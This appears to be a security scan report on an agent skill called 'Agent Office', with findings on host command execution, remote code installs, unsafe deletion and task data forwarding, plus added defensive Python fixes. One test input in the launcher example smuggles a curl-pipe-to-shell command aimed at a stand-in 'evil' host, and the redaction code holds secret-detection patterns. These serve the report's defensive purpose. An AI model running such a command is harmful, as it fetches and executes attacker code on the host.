Agent Office

Security checks across malware telemetry and agentic risk

Overview

The skill largely does what it advertises, but it can create persistent local AI workers that run commands, install remote runtime code, store task summaries, and forward task context to other services.

Install only if you intentionally want a local multi-agent worker system. Keep workers bound to localhost. Avoid broad --workspace values, and avoid a custom --cli-cmd unless you trust the command it launches. Treat DeerFlow mode as capable of host command execution and file writes, and do not point it at untrusted DeerFlow repositories or extra mounts. Configure MEMORY_CLI or an external upstream URL only if you accept that task content and summaries will be persisted locally or forwarded to that service.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Behavioral AST: exec() Call, eval() Call, Dynamic Import
  • Taint Tracking: Direct Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
Findings (22)

subprocess module call

Medium
Category
Dangerous Code Execution
Content
        run_kwargs["input"] = prompt_text

        try:
            result = subprocess.run(cmd, **run_kwargs)
            if result.returncode == 0:
                stdout = (result.stdout or "").strip()
                stderr = (result.stderr or "").strip()
Confidence
97% confidence
Finding
result = subprocess.run(cmd, **run_kwargs)

Tainted flow: 'STATE_FILE' from os.environ.get (line 42, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
def save_state(data: dict):
    with open(STATE_FILE, "w", encoding="utf-8") as f:
        json.dump(data, f, ensure_ascii=False, indent=2)
Confidence
83% confidence
Finding
with open(STATE_FILE, "w", encoding="utf-8") as f:

Tainted flow: 'worker_dir' from os.environ.get (line 586, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
"EXTERNAL_UPSTREAM_URL": external_upstream_url or "-",
        },
    )
    with open(worker_dir / "SOUL.md", "w", encoding="utf-8") as f:
        f.write(rendered.strip() + "\n")
Confidence
82% confidence
Finding
with open(worker_dir / "SOUL.md", "w", encoding="utf-8") as f:

Tainted flow: 'worker_dir' from os.environ.get (line 586, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
"external_mode": "bridge",
            }
        )
    with open(worker_dir / "config.json", "w", encoding="utf-8") as f:
        json.dump(config, f, ensure_ascii=False, indent=2)

    # ── update state ─────────────────────────────────────
Confidence
83% confidence
Finding
with open(worker_dir / "config.json", "w", encoding="utf-8") as f:

Tainted flow: 'STATE_FILE' from os.environ.get (line 42, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
"available": list(range(5011, 5021))
            }
        }
        with open(STATE_FILE, "w", encoding="utf-8") as f:
            json.dump(data, f, ensure_ascii=False, indent=2)
Confidence
84% confidence
Finding
with open(STATE_FILE, "w", encoding="utf-8") as f:

Tainted flow: 'STATE_FILE' from os.environ.get (line 21, credential/environment) → open (file write)

Medium
Category
Data Flow
Content
def save_state(data):
    with open(STATE_FILE, "w", encoding="utf-8") as f:
        json.dump(data, f, ensure_ascii=False, indent=2)
Confidence
84% confidence
Finding
with open(STATE_FILE, "w", encoding="utf-8") as f:

Lp3

Medium
Category
MCP Least Privilege
Confidence
93% confidence
Finding
The skill declares substantial capabilities—shell execution, file read/write, network access, environment use, and daemonized HTTP workers—but does not expose an explicit permissions model or user-consent boundary. That makes the skill harder to reason about and increases the chance that a user invokes behavior with broader system and data impact than expected, especially because it can create processes, bind ports, write persistent state, and interact with external tools.

Tp4

High
Category
MCP Tool Poisoning
Confidence
95% confidence
Finding
The documented purpose understates several materially risky behaviors: cloning/updating remote code from GitHub, bridging to external HTTP services, using a shared memory CLI, orchestrating multi-step flows, and enabling DeerFlow workers with host file and bash capabilities. This mismatch can cause operators to trust and deploy the skill as simple local office automation when it actually expands the attack surface to remote code supply chain, lateral data access, and command execution.

Context-Inappropriate Capability

Medium
Confidence
97% confidence
Finding
The generated runtime configuration explicitly enables broad web access, file read/write tools, and allow_host_bash: true for each worker. In an agent-office context, this gives autonomous workers capabilities to execute arbitrary host commands and interact with the network, which can lead to host compromise, data exfiltration, lateral movement, or destructive file changes if the agent is prompted maliciously or behaves unexpectedly.

Intent-Code Divergence

Medium
Confidence
92% confidence
Finding
The comment claims only the current worker's local files are exposed, but optional mounts sourced from AGENT_OFFICE_DEERFLOW_EXTRA_MOUNTS can add arbitrary existing host paths into the sandbox. This mismatch increases the chance that operators believe isolation is stronger than it is, while the worker may actually gain access to sensitive host directories beyond its own workspace.

Context-Inappropriate Capability

Medium
Confidence
95% confidence
Finding
The server writes task-derived summaries into shared memory even though its stated purpose is hosting office workers, not persisting user content into a broader memory system. This can leak sensitive prompts, outputs, or business data into another subsystem without clear user awareness or minimization controls.

Context-Inappropriate Capability

High
Confidence
99% confidence
Finding
The CLI engine allows configurable command and argument overrides, effectively transforming the worker into an arbitrary local command launcher. That capability is significantly broader than the advertised office-automation role and can be abused for unauthorized file access, persistence, or execution of attacker-chosen tools.
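One way to keep a configurable --cli-cmd from turning the worker into a generic launcher is to allow-list the binary, pin argv[0] to the copy found on PATH, and run it with shell=False, a timeout and a minimal environment. The block below is an added example, not code from Agent Office: ALLOWED_BINARIES, the helper names and the restricted PATH are assumptions for this illustration, and the subprocess call mirrors the prompt-on-stdin pattern the first finding on this page shows.

```python
"""Allow-listed launcher for a worker's CLI engine.

Added example, not code from Agent Office. The operator-supplied command
string models the --cli-cmd override; ALLOWED_BINARIES and the helper
names are assumptions for this illustration.
"""
import shlex
import shutil
import subprocess
from pathlib import Path

# Assumed allow list: basenames of binaries a worker may launch. Anything
# else, including /bin/sh, python or curl, is refused before it runs.
ALLOWED_BINARIES = frozenset({"claude", "codex", "hermes"})
SHELL_METACHARS = ";|&$`<>\n"


def check_cli_cmd(cli_cmd: str, allowed=ALLOWED_BINARIES):
    """Return None if cli_cmd is acceptable, otherwise the reason it is not."""
    if any(ch in cli_cmd for ch in SHELL_METACHARS):
        return "shell metacharacters are not allowed"
    try:
        argv = shlex.split(cli_cmd)
    except ValueError as exc:  # unbalanced quotes
        return f"unparseable command: {exc}"
    if not argv:
        return "empty command"
    base = Path(argv[0]).name
    if base not in allowed:
        return f"{base!r} is not an allow-listed worker binary"
    if shutil.which(base) is None:
        return f"{base!r} is not on PATH"
    return None


def resolve_cli_cmd(cli_cmd: str, allowed=ALLOWED_BINARIES) -> list:
    """Turn an accepted command string into argv, with argv[0] pinned to the
    binary found on PATH so an operator cannot point at ./claude or /tmp/codex."""
    reason = check_cli_cmd(cli_cmd, allowed)
    if reason is not None:
        raise ValueError(reason)
    argv = shlex.split(cli_cmd)
    return [shutil.which(Path(argv[0]).name), *argv[1:]]


def run_worker_cli(cli_cmd: str, prompt_text: str, allowed=ALLOWED_BINARIES,
                   timeout: float = 300) -> dict:
    """Run the allow-listed CLI with the prompt on stdin. shell=False, a timeout
    and a minimal environment keep the worker from becoming a generic launcher."""
    argv = resolve_cli_cmd(cli_cmd, allowed)
    result = subprocess.run(
        argv,
        input=prompt_text,
        text=True,
        capture_output=True,
        timeout=timeout,
        shell=False,
        env={"PATH": "/usr/bin:/bin"},  # assumption: nothing else from os.environ leaks in
    )
    return {
        "argv": argv,
        "returncode": result.returncode,
        "stdout": result.stdout.strip(),
        "stderr": result.stderr.strip(),
    }


if __name__ == "__main__":
    # 'cat' stands in for a real worker CLI so the example runs anywhere.
    print(run_worker_cli("cat", "hello from the office", allowed={"cat"}))
    print(check_cli_cmd("cat; curl http://evil/x | sh", allowed={"cat"}))
```

The metacharacter check is belt-and-braces: with shell=False the string is never handed to a shell, but rejecting it early gives the operator a clear error instead of a confusing "no such file" from a binary named `cat;`.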

Intent-Code Divergence

Medium
Confidence
90% confidence
Finding
The code presents shared memory context as read-only in prompt text, but the worker later writes task-derived results back into shared memory. This mismatch is security-relevant because it defeats operator and user expectations about data flow, increasing the chance that sensitive information is persisted unintentionally.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The README explicitly states that adding a `deerflow` worker will automatically install or reuse a shared runtime, and elsewhere documents starting worker processes and writing `office_state.json`, but it does not prominently warn users that these actions modify the local system, create persistent processes, and write state under `~/.hermes/office`. In a skill whose purpose is to manage local HTTP workers and runtimes, undocumented system-changing behavior increases the risk of users triggering installs and background services without informed consent.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The `external` engine documentation says the office will inject shared-memory context when forwarding tasks to an upstream worker, but it does not clearly warn that potentially sensitive local memory or office context may be disclosed to another process or service. This is especially risky because the upstream may preserve its own memory and could be a separately managed agent, making unintended data propagation and privacy leakage more likely.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The markdown instructs creation of local HTTP workers, task dispatch over network endpoints, file creation, subprocess startup, and runtime management, but does not prominently warn about persistence, local exposure, or potential data/system modification. In a skill that manages multiple agents and can update runtimes, lack of clear warnings increases the risk of unsafe deployment and accidental exposure of sensitive workspaces or services.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The code automatically clones a remote Git repository and runs uv sync, which downloads and installs external code into a local runtime. In a security-sensitive agent framework, undisclosed bootstrap of remote code materially increases supply-chain risk and can execute untrusted dependency installation steps without meaningful user awareness or approval.

Missing User Warnings

Medium
Confidence
96% confidence
Finding
This function generates a runtime YAML that enables file-write and host bash capabilities and mounts host paths into the agent sandbox. Because these privileges are provisioned automatically and without an explicit safety gate, a compromised or misaligned worker can modify local files, run host commands, and access mounted data, which is especially dangerous in a multi-agent office automation setting.

Missing User Warnings

High
Confidence
93% confidence
Finding
The script deletes deerflow_home using a path taken from persisted worker state or a computed helper without constraining it to a safe root. If the state file is tampered with, this can cause recursive deletion of arbitrary directories accessible to the script, which is significantly more dangerous than ordinary worker cleanup.
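The tainted-flow findings above (STATE_FILE and worker_dir taken from the environment and passed straight to open), the AGENT_OFFICE_DEERFLOW_EXTRA_MOUNTS mismatch, and the unconstrained deerflow_home deletion share one fix: resolve every such path, follow symlinks, and refuse anything that is not strictly inside a trusted root before writing, mounting or deleting. The block below is an added example, not Agent Office code; it uses ~/.hermes/office, the root the report names, as its default, while AGENT_OFFICE_ROOT, the comma-separated mount format and the helper names are assumptions.

```python
"""Confine environment- and state-derived paths to a trusted root.

Added example, not Agent Office code. It uses ~/.hermes/office, the root the
scan report names, as the default; the comma-separated
AGENT_OFFICE_DEERFLOW_EXTRA_MOUNTS format and the helper names are
assumptions for this illustration.
"""
import os
import shutil
import tempfile
from pathlib import Path

DEFAULT_ROOT = Path.home() / ".hermes" / "office"


def confine(candidate, root=DEFAULT_ROOT) -> Path:
    """Resolve candidate (relative to root if not absolute) and require the
    result to be strictly inside root after symlinks are followed."""
    root_p = Path(root).resolve()
    cand = Path(candidate)
    full = (cand if cand.is_absolute() else root_p / cand).resolve()
    if full == root_p or root_p not in full.parents:
        raise ValueError(f"{candidate} escapes {root_p}")
    return full


def resolve_state_file(env_value=None, root=DEFAULT_ROOT) -> Path:
    """STATE_FILE may come from the environment; it must still live under root."""
    if env_value is None:
        env_value = os.environ.get("STATE_FILE", "office_state.json")
    return confine(env_value, root)


def parse_extra_mounts(env_value: str, allowed_root) -> list:
    """Each extra mount must exist and sit under allowed_root; /etc, ~/.ssh or
    a symlink pointing outside is rejected instead of mounted."""
    mounts = []
    for raw in (s.strip() for s in env_value.split(",")):
        if not raw:
            continue
        p = confine(raw, allowed_root)
        if not p.exists():
            raise ValueError(f"mount {raw} does not exist")
        mounts.append(p)
    return mounts


def safe_rmtree(target, root=DEFAULT_ROOT) -> Path:
    """Cleanup for deerflow_home: refuse root itself, anything outside it, and
    anything that is not a directory, even if the state file was tampered with."""
    full = confine(target, root)
    if not full.is_dir():
        raise ValueError(f"{target} is not a directory under {Path(root).resolve()}")
    shutil.rmtree(full)
    return full


def _rejects(fn, *args) -> bool:
    try:
        fn(*args)
    except ValueError:
        return True
    return False


def demo() -> dict:
    """Exercise the checks against a constructed office tree in a temp dir."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "office"
        worker = root / "workers" / "w1"
        (worker / "deerflow_home").mkdir(parents=True)
        (root / "data").mkdir()
        (worker / "escape").symlink_to(Path(tmp))  # symlink pointing out of root

        return {
            "state_ok": resolve_state_file("office_state.json", root).parent == root.resolve(),
            "state_escape_rejected": _rejects(resolve_state_file, "../outside.json", root),
            "mount_ok": parse_extra_mounts(str(root / "data"), root) == [(root / "data").resolve()],
            "mount_etc_rejected": _rejects(parse_extra_mounts, "/etc", root),
            "mount_symlink_rejected": _rejects(parse_extra_mounts, str(worker / "escape"), root),
            "root_delete_rejected": _rejects(safe_rmtree, root, root),
            "tampered_path_rejected": _rejects(safe_rmtree, "../../../../", root),
            "cleanup_ok": not safe_rmtree(worker / "deerflow_home", root).exists(),
        }


if __name__ == "__main__":
    print(demo())
```

The containment check is done on the resolved path, so a worker_dir entry in a tampered office_state.json that points at a symlink, or at `../../..`, fails before shutil.rmtree ever sees it.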

Missing User Warnings

Medium
Confidence
95% confidence
Finding
User task content is sent to an external memory CLI for storage without any user-facing warning or consent mechanism. In a worker system that may process sensitive business tasks, this silent onward transfer creates a confidentiality and compliance risk.

Missing User Warnings

High
Confidence
98% confidence
Finding
The external engine forwards task descriptions and shared-memory context over HTTP to an upstream worker without any user-facing warning. Because this server is specifically designed to process office tasks, forwarded content may include sensitive internal data, and the forwarding text explicitly packages that context for another agent to use.

Ssd 3

Medium
Confidence
91% confidence
Finding
The forwarded description tells the external agent to retain its original identity and long-term memory, while also embedding task details and shared-memory context. That creates a natural-language data-leak pathway because sensitive information is intentionally handed to another agent context that may persist or reuse it beyond the current task.
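The last four findings describe the same gap from different angles: task text and shared-memory context leave the worker, to a memory CLI or an upstream over HTTP, with no consent step and no minimization. The block below is an added example, not Agent Office code, of the gate a practitioner would put in front of that forwarding: forwarding is off until the operator opts in, non-loopback upstreams need a second opt-in, shared-memory context is omitted unless explicitly shared, and secret-shaped tokens are redacted from what remains. The AGENT_OFFICE_FORWARD_CONSENT, AGENT_OFFICE_SHARE_MEMORY and AGENT_OFFICE_ALLOW_REMOTE_UPSTREAM switches, the payload shape and the secret patterns are assumptions, and the sample task and memory text are constructed.

```python
"""Consent-gated, minimized forwarding of task context to an upstream.

Added example, not Agent Office code. The switches
AGENT_OFFICE_FORWARD_CONSENT, AGENT_OFFICE_SHARE_MEMORY and
AGENT_OFFICE_ALLOW_REMOTE_UPSTREAM, the payload shape and the secret
patterns are assumptions; the sample task text is constructed.
"""
import ipaddress
import re
from urllib.parse import urlparse

# (pattern, replacement): keep the key name, drop the value.
SECRET_PATTERNS = [
    (re.compile(r"(?i)\b(api[_-]?key|secret|token|password)\s*[:=]\s*\S+"), r"\1=[REDACTED]"),
    (re.compile(r"\b(?:sk|ghp|xox[abp])-[A-Za-z0-9_-]{16,}"), "[REDACTED]"),
    (re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----[\s\S]*?-----END [A-Z ]*PRIVATE KEY-----"),
     "[REDACTED PRIVATE KEY]"),
]


def redact(text: str) -> str:
    """Strip secret-shaped values before anything leaves the worker."""
    for pattern, repl in SECRET_PATTERNS:
        text = pattern.sub(repl, text)
    return text


def check_upstream_url(url: str, env: dict) -> tuple:
    """Loopback upstreams are fine by default; anything else needs an explicit
    opt-in, since the forwarded payload leaves the host."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, f"unsupported upstream URL: {url}"
    host = parts.hostname
    try:
        is_local = ipaddress.ip_address(host).is_loopback
    except ValueError:  # not an IP literal
        is_local = host == "localhost"
    if is_local:
        return True, "loopback upstream"
    if env.get("AGENT_OFFICE_ALLOW_REMOTE_UPSTREAM") == "1":
        return True, "remote upstream explicitly allowed"
    return False, f"remote upstream {host} not allowed without AGENT_OFFICE_ALLOW_REMOTE_UPSTREAM=1"


def build_forward_payload(task_text: str, shared_memory: str, upstream_url: str, env: dict) -> dict:
    """Decide whether to forward and, if so, what. Returns a dict with
    'allowed', 'reason' and (when allowed) the minimized 'payload'."""
    if env.get("AGENT_OFFICE_FORWARD_CONSENT") != "1":
        return {"allowed": False,
                "reason": "forwarding is off; set AGENT_OFFICE_FORWARD_CONSENT=1 to opt in"}
    ok, reason = check_upstream_url(upstream_url, env)
    if not ok:
        return {"allowed": False, "reason": reason}
    payload = {"task": redact(task_text)}
    if env.get("AGENT_OFFICE_SHARE_MEMORY") == "1":
        payload["shared_memory"] = redact(shared_memory)
    else:
        payload["shared_memory"] = None  # omitted unless the operator opted in
    return {"allowed": True, "reason": reason, "payload": payload}


# Constructed sample inputs, not data from the page.
SAMPLE_TASK = "Draft the Q3 board memo. Use api_key=AK0123456789 for the finance export."
SAMPLE_MEMORY = "Previous worker notes: deploy token sk-abcdefghijklmnopqrstuvwxyz123456 rotated on Monday."

if __name__ == "__main__":
    env = {"AGENT_OFFICE_FORWARD_CONSENT": "1"}
    print(build_forward_payload(SAMPLE_TASK, SAMPLE_MEMORY, "http://127.0.0.1:5011/task", env))
```

Redaction is a backstop, not the control: the consent switches are what keep business content from being persisted or forwarded by default, and the regexes only catch the obvious token shapes.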

VirusTotal

66/66 vendors flagged this skill as clean.
